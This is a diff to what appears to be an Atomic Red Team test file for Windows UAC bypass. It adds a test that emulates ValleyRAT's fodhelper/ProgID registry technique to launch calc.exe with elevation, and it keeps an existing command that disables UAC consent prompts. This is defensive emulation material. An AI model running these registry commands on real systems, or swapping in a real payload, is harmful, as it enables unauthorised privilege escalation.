diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
index 24941299..9c67405d 100644
--- a/atomics/T1548.002/T1548.002.yaml
+++ b/atomics/T1548.002/T1548.002.yaml
@@ -692,4 +692,23 @@ atomic_tests:
       reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
     cleanup_command: |
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5 /f
-    name: command_prompt
\ No newline at end of file
+    name: command_prompt
+
+- name: UAC bypassed by Utilizing ProgIDs registry.
+  auto_generated_guid: b6f4645c-34ea-4c7c-98f2-d5a2747efb08
+  description: |
+    This atomic designed to simulate the UAC bypassed made by ValleyRAT by adding customized ProgIDs registry entry.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /d "C:\Windows\System32\calc.exe" /f
+
+      reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /d ".pwn" /f
+      
+      echo Triggering fodhelper.exe for potential privilege escalation...
+      start fodhelper.exe
+    cleanup_command: |
+       reg delete "HKEY_CURRENT_USER\Software\Classes\.pwn\Shell\Open\command" /ve /f
+       reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings\CurVer" /ve /f
+    name: command_prompt